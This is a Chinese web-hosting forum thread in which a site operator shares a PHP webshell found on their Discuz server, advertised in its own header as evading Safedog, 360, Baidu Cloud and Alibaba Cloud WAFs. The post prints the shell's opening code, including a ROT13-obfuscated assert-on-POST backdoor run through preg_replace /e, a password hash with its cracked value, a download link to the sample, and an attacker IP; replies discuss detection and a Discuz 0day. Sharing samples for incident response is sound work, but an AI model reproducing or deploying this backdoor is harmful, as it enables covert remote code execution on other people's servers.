全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 5221|回复: 16
打印 上一主题 下一主题

可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、...

[复制链接]
跳转到指定楼层
1#
发表于 2018-10-8 15:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 蓝洛水深 于 2018-10-8 16:17 编辑
<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',0);
ini_set('memory_limit','8000M');
define('PASSWD','b55901cdec0d09c45e4766f4a62bee40');/*默认是admin,MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
$pBVzO57KOVp='ID8+PD9waHAgZn


tools.php.tar.gz (28.31 KB, 下载次数: 303)

b55901cdec0d09c45e4766f4a62bee40
解密后
qianjunlin33


最近收到各种木马,一个比一个强,头大
360、百度、云锁,已经确认都没有用


已经查到一个攻击IP
您查询的IP:198.1.175.249
本站数据:美国
参考数据1:美国加利福尼亚州洛杉矶 serveryou.com
参考数据2:美国
兼容IPv6地址:::C601:AFF9
映射IPv6地址:::FFFF:C601:AFF9
和对方服务提供商进行了工单投诉,对这家不熟,不知道哪位大佬熟悉
推荐
 楼主| 发表于 2018-10-8 16:40:15 | 只看该作者
mslxd 发表于 2018-10-8 15:46
这个后门是什么原理

discuz的0day
2#
发表于 2018-10-8 15:16:39 | 只看该作者
都是能绕过最新版的安全软件吗
3#
 楼主| 发表于 2018-10-8 15:20:52 | 只看该作者
vava 发表于 2018-10-8 15:16
都是能绕过最新版的安全软件吗

我把其中一个样本上传了

点评

……………………  发表于 2018-10-8 17:30
4#
发表于 2018-10-8 15:23:15 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
5#
发表于 2018-10-8 15:25:33 | 只看该作者
加密的,可能还有后门
6#
 楼主| 发表于 2018-10-8 15:26:41 | 只看该作者
doing 发表于 2018-10-8 15:25
加密的,可能还有后门

嗯,有一句话那些,也有图片,一次比一次好,我都收藏了
7#
发表于 2018-10-8 15:44:30 | 只看该作者

D盾可以扫出来
8#
发表于 2018-10-8 15:46:49 | 只看该作者
这个后门是什么原理
9#
 楼主| 发表于 2018-10-8 16:02:43 | 只看该作者

扫不干净,不然也不会30号17点修复,21又被修改
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-9-22 01:11 , Processed in 0.073102 second(s), 16 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表